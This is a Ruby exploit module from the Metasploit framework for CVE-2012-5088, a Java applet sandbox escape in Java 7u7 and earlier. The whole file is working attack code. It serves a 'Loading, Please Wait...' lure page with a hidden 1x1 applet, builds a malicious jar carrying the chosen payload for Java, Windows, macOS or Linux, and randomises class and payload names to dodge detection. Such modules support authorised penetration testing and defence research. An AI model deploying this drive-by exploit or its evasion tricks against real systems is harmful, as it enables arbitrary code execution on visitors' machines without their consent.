Path: blob/master/modules/exploits/multi/browser/java_jre17_method_handle.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2012-5088 (Java Applet Method Handle).
#
# The module serves a small HTML page that embeds an applet; the applet jar is
# assembled per request from two pre-built class files shipped in the
# framework data directory plus the selected Java payload. The module's own
# description states that only Java 7u7 and earlier are affected, so a patched
# runtime is the primary mitigation.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  # Directory (below the framework data directory) holding the two class
  # files loaded in #setup.
  DATA_SUBDIR = %w[exploits cve-2012-5088].freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java Applet Method Handle Remote Code Execution',
      'Description'    => %q{
          This module abuses the Method Handle class from a Java Applet to run arbitrary
        Java code outside of the sandbox. The vulnerability affects Java version 7u7 and
        earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery at security-explorations.com
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-5088' ],
          [ 'OSVDB', '86352' ],
          [ 'BID', '56057' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]
        ],
      'Platform'       => %w{ java linux osx win },
      'Payload'        => { 'Space' => 20480, 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch'     => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch'     => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2012-10-16'
    ))
  end

  # Loads the two pre-built class files from disk and picks a random name for
  # the main class. The class name is rewritten inside the class bytes before
  # the parent's setup runs, so every module instance serves a differently
  # named class; the "B" loader class keeps its original name.
  def setup
    @exploit_class = read_class_file("Exploit.class")
    @loader_class  = read_class_file("B.class")

    # Same length as the original identifier so the constant-pool entry the
    # substitution overwrites keeps its size.
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  # HTTP dispatcher for the module's resource.
  #
  # * a URI ending in ".jar" receives the assembled applet jar;
  # * a URI ending in "/" receives the HTML page that references the jar
  #   (a fresh payload is generated for the client first);
  # * anything else is redirected to the resource root.
  #
  # @param cli     [Object] connected client handle passed to the send_* helpers
  # @param request [Object] parsed request; only #uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      generated = regenerate_payload(cli)
      unless generated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Minimal landing page: a title/body placeholder plus a 1x1 applet tag whose
  # archive name is random per request and whose code attribute points at the
  # renamed main class chosen in #setup.
  #
  # @return [String] the HTML document
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one of the shipped class files as binary.
  #
  # @param file_name [String] basename inside the module's data directory
  # @return [String] raw (ASCII-8BIT) class file contents
  def read_class_file(file_name)
    File.binread(File.join(Msf::Config.data_directory, *DATA_SUBDIR, file_name))
  end

  # Assembles the applet jar from the encoded payload jar plus the two class
  # files loaded in #setup. The "metasploit"/"Payload" identifiers of the
  # payload jar are replaced with random strings of the same length, in both
  # entry names and entry contents, before the manifest is rebuilt.
  #
  # @return [Object] the jar object expected by #send_response
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("B.class", @loader_class)

    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      # Names are rewritten in place; data is replaced with a new string.
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str).gsub("Payload", payload_str)
    end
    jar.build_manifest
    jar
  end
end